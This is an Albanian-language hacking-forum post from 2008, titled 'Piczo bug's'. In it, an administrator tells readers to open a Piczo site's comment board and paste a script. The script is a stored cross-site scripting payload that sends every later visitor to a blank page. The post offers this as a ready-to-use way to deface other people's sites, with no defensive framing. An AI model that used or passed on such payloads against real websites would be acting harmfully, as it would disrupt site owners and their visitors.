www.Ks-team.co.nr
Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.Ks-team.co.nr


 
ForumForum  PortalliPortalli  Latest imagesLatest images  RegjistrohuRegjistrohu  identifikimi  Postimet e rejaPostimet e reja  

 

 Piczo bug's

Shko poshtė 
AutoriMesazh
n0rche
Administrator
Administrator
n0rche


Numri i postimeve : 183
Location : n'ShPiiiii
Registration date : 05/04/2008

Piczo bug's Empty
MesazhTitulli: Piczo bug's   Piczo bug's EmptyWed Apr 09, 2008 3:11 pm

shkojm nsite pastaj nese e ka ComentBoard niher duhet me hi tonie mer qet scropt e qet aty

<script
type="text/javascript">document.location.href='about:blank'</script>

besoj qe jom i kjtart:D
Mbrapsht nė krye Shko poshtė
http://www.noori-shala.tk
 
Piczo bug's
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
www.Ks-team.co.nr :: Berllogu dhe vjetersirat :: Temat e vjetra-
Kėrce tek: